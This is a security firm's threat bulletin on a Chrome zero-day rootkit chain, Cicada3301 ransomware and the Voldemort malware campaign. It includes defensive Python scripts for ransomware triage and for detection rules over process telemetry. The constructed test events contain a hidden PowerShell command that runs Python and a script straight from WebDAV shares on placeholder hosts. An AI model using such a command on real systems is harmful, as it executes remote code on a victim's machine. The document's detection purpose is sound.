
NormCyber Threat Bulletin: 4th September 2024


Chrome Zero-Day Vulnerability CVE-2024-7971 Leads to Rootkit Deployment

A recent report from Microsoft has revealed that the North Korean threat actor Citrine Sleet has been exploiting a zero-day vulnerability in Google Chrome to deploy a sophisticated rootkit. The rootkit, known as FudModule, provides attackers with extensive system control, allowing them to steal sensitive data, monitor network traffic, and perform other malicious activities.

The zero-day vulnerability, identified as CVE-2024-7971, is a type confusion flaw in V8, the JavaScript and WebAssembly engine used by Chrome and by every other Chromium-based browser. Triggered from a malicious web page, it gives the attacker arbitrary code execution only inside the sandboxed Chromium renderer process, which on its own cannot touch the kernel. Microsoft reports that Citrine Sleet chained it with a Windows kernel privilege-escalation flaw, CVE-2024-38106, to escape the sandbox, and only then deployed FudModule; that kernel flaw had already been fixed in the August 2024 Windows security update, so hosts that had applied it were protected from the sandbox escape even while their browser was still unpatched. Google shipped the V8 fix in Chrome 128.0.6613.84/.85 on 21 August 2024.

The rootkit’s capabilities include:

  • Kernel tampering: FudModule can modify the kernel to bypass security mechanisms and gain full system control.
  • Direct Kernel Object Manipulation (DKOM): The rootkit can directly manipulate kernel objects, allowing it to evade detection and maintain persistence.
  • Data exfiltration: FudModule can steal sensitive data, such as login credentials, financial information, and intellectual property.
  • Network monitoring: The rootkit can monitor network traffic to identify potential targets and exfiltrate stolen data.

Microsoft has warned that the FudModule rootkit is a significant threat and urged users to update their browsers to a build that includes the fix. Because the bug is in V8, that applies to Microsoft Edge and other Chromium-based browsers, not just Chrome, and because the rootkit arrives via a kernel exploit, the August 2024 Windows updates matter as much as the browser update. Organisations should also implement robust security measures, such as firewalls, intrusion detection systems, and regular security audits, to protect against similar attacks.

The exploitation of this zero-day vulnerability by Citrine Sleet highlights the ongoing threat posed by North Korean cyber actors. These groups have been increasingly active in recent years, targeting governments, businesses, and critical infrastructure with a variety of malicious activities.

To protect themselves from Citrine Sleet and other cyber threats, organisations and individuals should:

  • Keep software up to date: Regularly install security patches and updates for all systems and applications.
  • Be cautious of suspicious emails: Avoid clicking on links or opening attachments from unknown or untrusted sources.
  • Use strong passwords: Create complex and unique passwords for all online accounts.
  • Implement security best practices: Employ a variety of security measures, such as firewalls, intrusion detection systems, and multi-factor authentication.

By utilising NormCyber’s Vulnerability Patch Management module, customers can ensure they are protected against vulnerabilities disclosed through vendor security advisories and bug bounty programmes.

References:

North Korean threat actor Citrine Sleet exploiting Chromium zero-day | Microsoft Security Blog
North Korean hackers exploit Chrome zero-day to deploy rootkit | Bleeping Computer
North Korean hackers exploited Chrome zero-day to steal crypto | Yahoo
Google Chrome Vulnerability Exploited by North Korean Hackers, Microsoft Warns | Security Bitcoin News

Emerging Ransomware Operation – Cicada3301

A new ransomware-as-a-service (RaaS) operation named Cicada3301 has swiftly made its presence known by listing 19 victims on its extortion portal. This sophisticated cyber crime group is rapidly targeting companies worldwide.

Despite sharing a name with the Cicada 3301 internet puzzle of 2012-2014, there is no connection between the puzzle and this ransomware operation. The organisation behind the original puzzle, known for its cryptographic challenges, has publicly distanced itself from the ransomware and condemned its actions in a statement dated 1 September 2024.

Cicada3301 began promoting its operation and recruiting affiliates on June 29, 2024, via the RAMP cyber crime forum. However, reports indicate that the group was active as early as June 6, 2024, suggesting that they were independently operating before their recruitment efforts.

Much like other ransomware operations, Cicada3301 employs double-extortion tactics: breaching networks, stealing data, encrypting files, and using threats to leak stolen data to coerce victims into paying ransoms. They operate a data leak site to facilitate this extortion scheme.

Analysis by TrueSec has uncovered significant similarities between Cicada3301 and ALPHV/BlackCat, suggesting a possible rebrand or a fork by former ALPHV team members. Notable similarities include:

  • Both are written in Rust.
  • Both use the ChaCha20 encryption algorithm.
  • Both employ identical VM shutdown and snapshot-wiping commands.
  • Both use similar user interface command parameters, file naming conventions, and ransom note decryption methods.
  • Both utilise intermittent encryption for larger files.

ALPHV, previously involved in a high-profile exit scam, had shut down operations in early March 2024. The Cicada3301 operation may also be linked to the Brutus botnet, which has been associated with large-scale VPN brute-forcing activities targeting various network appliances. The Brutus activity emerged shortly after ALPHV’s shutdown, indicating a possible connection.

Cicada3301’s ransomware is notable for targeting both Windows and Linux/VMware ESXi environments. The Linux encryptor for VMware ESXi will not run unless a key is supplied as a command-line argument (--key); the key decrypts an embedded configuration that drives the rest of the run, which also means a sample captured without its key cannot simply be detonated in a sandbox. Files are encrypted with the ChaCha20 stream cipher and the ChaCha20 key is protected with RSA, so recovery without the operator’s private key is not feasible.

Like BlackCat/ALPHV before it, Cicada3301 targets specific file extensions and applies intermittent encryption based on file size, encrypting only parts of larger files to finish faster while still rendering them unusable. The encryptor appends a random seven-character extension to encrypted files and drops ransom notes named ‘RECOVER-[extension]-DATA.txt’. Further command-line options delay execution (--sleep) and skip the ESXi virtual machine shutdown step (--no_vm_ss) before encrypting, so that running VMs are encrypted in place.
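Intermittent encryption is the detail that trips up naive triage: a whole-file entropy check sees a mostly-plaintext file and calls it untouched. The script below is an added example, not code from Cicada3301, Truesec or BleepingComputer. It walks a directory, pulls the appended extension out of any RECOVER-<ext>-DATA.txt note it finds, counts the files carrying that extension and profiles each one chunk by chunk, so partial encryption shows up as a mix of high- and low-entropy blocks. The victim tree is constructed in a temporary directory and ciphertext is simulated with random bytes; the extension, file names and chunk size are assumptions, not values from the real encryptor.

```python
"""Post-incident triage for Cicada3301-style encryptors (added example).

Finds RECOVER-<ext>-DATA.txt notes, derives the random extension, and
profiles affected files per chunk so intermittent encryption is visible.
Sample tree is constructed; random bytes stand in for ChaCha20 output.
"""
import math
import os
import re
import tempfile
from collections import Counter
from pathlib import Path

NOTE_RE = re.compile(r"^RECOVER-([A-Za-z0-9]{7})-DATA\.txt$")
CHUNK = 4096           # analysis granularity in bytes (assumed, not the encryptor's block size)
HIGH_ENTROPY = 7.0     # bits/byte; ciphertext sits near 8, text around 4-5


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte of `data` (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def entropy_profile(path: Path, chunk: int = CHUNK) -> list:
    """Entropy of each successive chunk, so partial encryption is visible."""
    profile = []
    with open(path, "rb") as fh:
        while block := fh.read(chunk):
            profile.append(shannon_entropy(block))
    return profile


def classify(profile: list, threshold: float = HIGH_ENTROPY) -> str:
    """'full' if every chunk looks like ciphertext, 'intermittent' if only some do."""
    high = [e >= threshold for e in profile]
    if high and all(high):
        return "full"
    if any(high):
        return "intermittent"
    return "plaintext"


def find_note_extensions(root: Path) -> dict:
    """Map each extension named in a RECOVER-<ext>-DATA.txt note to its note paths."""
    found = {}
    for note in root.rglob("RECOVER-*-DATA.txt"):
        m = NOTE_RE.match(note.name)
        if m:
            found.setdefault(m.group(1), []).append(note)
    return found


def triage(root: Path) -> dict:
    """For each extension seen in a note, classify every file carrying it."""
    report = {}
    for ext, notes in find_note_extensions(root).items():
        files = {}
        for path in root.rglob(f"*.{ext}"):
            files[path.name] = classify(entropy_profile(path))
        report[ext] = {"notes": len(notes), "files": files}
    return report


def build_sample_tree(root: Path, ext: str = "x7k2p9q") -> None:
    """Constructed sample victim tree; the extension and names are made up."""
    text = b"quarterly figures, nothing secret here\n" * 200     # 7800 bytes of plaintext
    (root / "vm").mkdir()
    (root / "vm" / f"RECOVER-{ext}-DATA.txt").write_text("constructed ransom note\n")
    (root / "untouched.txt").write_bytes(text)
    # small file: simulated full encryption
    (root / "vm" / f"small.vmdk.{ext}").write_bytes(os.urandom(len(text)))
    # large file: simulated intermittent encryption, only the first chunk rewritten
    big = bytearray(text * 40)                                    # ~312 KB
    big[:CHUNK] = os.urandom(CHUNK)
    (root / "vm" / f"big.vmdk.{ext}").write_bytes(bytes(big))


def demo() -> dict:
    """Build the sample tree in a temp dir and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        return triage(root)


if __name__ == "__main__":
    for ext, info in demo().items():
        print(f"extension .{ext}: {info['notes']} note(s)")
        for name, verdict in sorted(info["files"].items()):
            print(f"  {name}: {verdict}")
```

On a real host, point `triage()` at the datastore or share root instead of `demo()`; the per-chunk profile also tells you which regions of a large file are still intact, which matters when deciding whether partial recovery from the plaintext tail is worth attempting.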

Make sure to regularly back up your important files and keep those backups disconnected from your network or otherwise immutable; an encryptor that can shut down and encrypt ESXi datastores will reach any backup it can see. Because the Linux variant is built for ESXi, harden hypervisor hosts as well: keep ESXi patched, restrict management and SSH access to a dedicated network, and lock down the accounts that can run commands on the host. Use strong, unique passwords and enable two-factor authentication on your accounts, keep your software up to date with the latest security patches, and be cautious with email attachments and links from unknown sources.

If you do fall victim to ransomware, NormCyber’s Cyber Security Incident Response Team (CSIRT) can assist by coordinating with your Incident Response (IR) team to provide expert guidance on managing the breach, implementing recovery strategies, and facilitating data recovery to minimise the impact on your organisation.

References:

Cicada3301 ransomware’s Linux encryptor targets VMware ESXi systems | Bleeping Computer
New Play ransomware Linux version targets VMware ESXi VMs | Bleeping Computer
3301-statement-september-1-2024.jpg (1020×1320) | Cicada 3301 Metaverse LLC
Cicada 3301 – Ransomware-as-a-Service – Technical Analysis | TrueSec

Tax-Themed Cyber Attack Unleashes Voldemort Malware

Proofpoint researchers have identified a sophisticated malware campaign that exploits Google Sheets as a command-and-control (C2) mechanism, targeting over 70 organisations across various sectors globally. Detected on August 5, 2024, the campaign impersonates tax authorities from multiple countries, including the U.S., U.K., France, Germany, Italy, India, and Japan. The attackers have sent approximately 20,000 phishing emails, using tax filing changes as bait to lure victims into clicking malicious Google AMP Cache URLs.

These URLs direct users to a landing page that checks the User-Agent string to identify whether the operating system is Windows. If so, the page uses the search-ms: URI protocol handler to present a Windows shortcut (LNK) file disguised as an Adobe Acrobat Reader PDF. When executed, the LNK file triggers a PowerShell command that runs Python from a remote WebDAV share, executing a script without writing any files to the victim’s computer. This script gathers system information, encodes it in Base64 and transmits it to a domain controlled by the attackers. A decoy PDF is then displayed and a password-protected ZIP file is downloaded from OpenDrive. Both delivery steps lean on Windows features that can be switched off where they are not needed: the search-ms: protocol handler can be disabled by removing its registry registration, and \\host@SSL\DavWWWRoot-style WebDAV paths only resolve while the WebClient service is running.

The ZIP archive contains a legitimate executable, “CiscoCollabHost.exe,” which is vulnerable to DLL side-loading, along with a malicious DLL named “CiscoSparkLauncher.dll,” referred to as Voldemort. This custom backdoor, written in C, is designed for information gathering and loading additional malware payloads. Voldemort uses Google Sheets for its C2 operations, facilitating data exfiltration and executing commands from the attackers.
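The chain above leaves a distinctive trail in process telemetry: Explorer launching PowerShell with a WebDAV UNC path in its command line, a Python interpreter whose image path is a remote share, and a Cisco-signed host executable running from a user-writable folder next to its side-loaded DLL. The detection logic below is an added example, not Proofpoint’s tooling or published rules, and runs those checks over a handful of constructed Sysmon-style events. The hostnames, user paths and the benign vendor install location are placeholders, and the Google Sheets rule assumes the backdoor talks to the Sheets API endpoint, which legitimate software can also do, so that rule yields a lead to triage rather than a verdict.

```python
"""Triage of Windows process and network telemetry for the Voldemort
delivery chain (added example). Events are constructed; hosts use the
.invalid TLD and are not indicators from Proofpoint's report."""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# UNC form of a WebDAV share as the Windows WebClient redirector exposes it,
# e.g. \\host@SSL\DavWWWRoot\ or \\host@SSL@8443\DavWWWRoot\
WEBDAV_UNC = re.compile(r"\\\\[\w.-]+(?:@SSL)?(?:@\d+)?\\DavWWWRoot\\", re.IGNORECASE)
PROGRAM_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\")
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
SHEETS_API_HOST = "sheets.googleapis.com"  # Google Sheets API; assumed C2 endpoint


@dataclass
class ProcEvent:
    parent: str    # parent image path
    image: str     # image path of the new process
    cmdline: str


@dataclass
class NetEvent:
    image: str
    dest_host: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, UNC paths included."""
    return PureWindowsPath(path).name.lower()


def check_process(ev: ProcEvent) -> list:
    """Rules for one process-creation event; returns the names that fired."""
    hits = []
    img = basename(ev.image)
    # Any binary executed straight off a WebDAV share (the remote python.exe).
    if WEBDAV_UNC.search(ev.image):
        hits.append("exec_from_webdav_share")
    # PowerShell (spawned by the LNK) invoking a Python interpreter on a remote share.
    if img in ("powershell.exe", "pwsh.exe") and WEBDAV_UNC.search(ev.cmdline) \
            and "python" in ev.cmdline.lower():
        hits.append("powershell_runs_remote_python")
    # The side-loading host run from anywhere other than a vendor install directory.
    if img == "ciscocollabhost.exe" and not ev.image.lower().startswith(PROGRAM_DIRS):
        hits.append("sideload_host_outside_program_files")
    return hits


def check_network(ev: NetEvent) -> list:
    """A non-browser process reaching the Sheets API is a lead, not a verdict."""
    if ev.dest_host.lower() == SHEETS_API_HOST and basename(ev.image) not in BROWSERS:
        return ["nonbrowser_sheets_api_traffic"]
    return []


def triage(proc_events, net_events) -> dict:
    """Map each rule that fired to the indices of the events it fired on."""
    report = {}
    for i, ev in enumerate(proc_events):
        for rule in check_process(ev):
            report.setdefault(rule, []).append(i)
    for i, ev in enumerate(net_events):
        for rule in check_network(ev):
            report.setdefault(rule, []).append(i)
    return report


# Constructed sample telemetry (Sysmon event 1 / event 3 fields, flattened).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_PROCS = [
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              r"powershell.exe -w hidden \\dav1.example.invalid@SSL\DavWWWRoot\python.exe "
              r"\\dav2.example.invalid@SSL\DavWWWRoot\stage.py"),
    ProcEvent(PS, r"\\dav1.example.invalid@SSL\DavWWWRoot\python.exe",
              r"python.exe \\dav2.example.invalid@SSL\DavWWWRoot\stage.py"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Users\alice\Downloads\unpacked\CiscoCollabHost.exe", "CiscoCollabHost.exe"),
    ProcEvent(r"C:\Windows\explorer.exe",                      # benign: hypothetical vendor path
              r"C:\Program Files\Cisco Spark\CiscoCollabHost.exe", "CiscoCollabHost.exe"),
]
SAMPLE_NET = [
    NetEvent(r"C:\Users\alice\Downloads\unpacked\CiscoCollabHost.exe", "sheets.googleapis.com"),
    NetEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe", "sheets.googleapis.com"),
]

if __name__ == "__main__":
    for rule, idx in triage(SAMPLE_PROCS, SAMPLE_NET).items():
        print(f"{rule}: events {idx}")
```

In production these checks map directly onto Sysmon event 1 (Image, ParentImage, CommandLine) and event 3 (Image, DestinationHostname) or the equivalent EDR fields; the WebDAV rule in particular has very few benign hits in most estates, so it is the one to alert on rather than just log.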

The campaign combines advanced persistent threat (APT) characteristics with techniques common in cyber crime, making it difficult to precisely attribute the activity. Proofpoint noted that the campaign’s approach to abusing file-scheme URIs to stage malware, particularly through WebDAV and Server Message Block (SMB), mirrors tactics seen in other malware families like Latrodectus, DarkGate, and XWorm. These families are often associated with initial access brokers (IABs) who provide entry points for larger cyber crime operations.

Proofpoint’s analysis uncovered six victims, one of whom is likely a security researcher or sandbox environment. The attackers appear to have cast a wide net initially, possibly to identify high-value targets later. The blend of sophisticated techniques with more basic methods, such as the use of common URI protocols and off-the-shelf tools, creates challenges in assessing the threat actor’s capabilities and the campaign’s ultimate objectives.

While the full extent of the campaign’s impact is not yet known, researchers assess that the activity is most likely cyber espionage, potentially in support of broader, undisclosed goals. Proofpoint has published a list of currently known IOCs in its research article, which we advise reading and loading into your detection tooling.

Alternatively, you can leave it to the professionals: here at NormCyber our Managed Threat Detection and Response service provides near real-time security monitoring for your network, services and devices. Using telemetry feeds, threat intelligence feeds, use cases and playbooks, the NormCyber Security Operations Centre (SOC) identifies and isolates threats in near real-time, giving you peace of mind 24 hours a day, every day.

References:

Cyberattackers Exploit Google Sheets for Malware Control in Global Espionage Campaign | The Hacker News
The Malware That Must Not Be Named: Suspected Espionage Campaign Delivers “Voldemort” | Proofpoint US
Voldemort Threat Actors Abusing Google Sheets to Attack Windows Users | GBHackers On Security

Get NormCyber’s threat bulletin direct to your inbox

NormCyber tracks and monitors the latest security trends and cyber threats and collates these into a fortnightly threat bulletin.
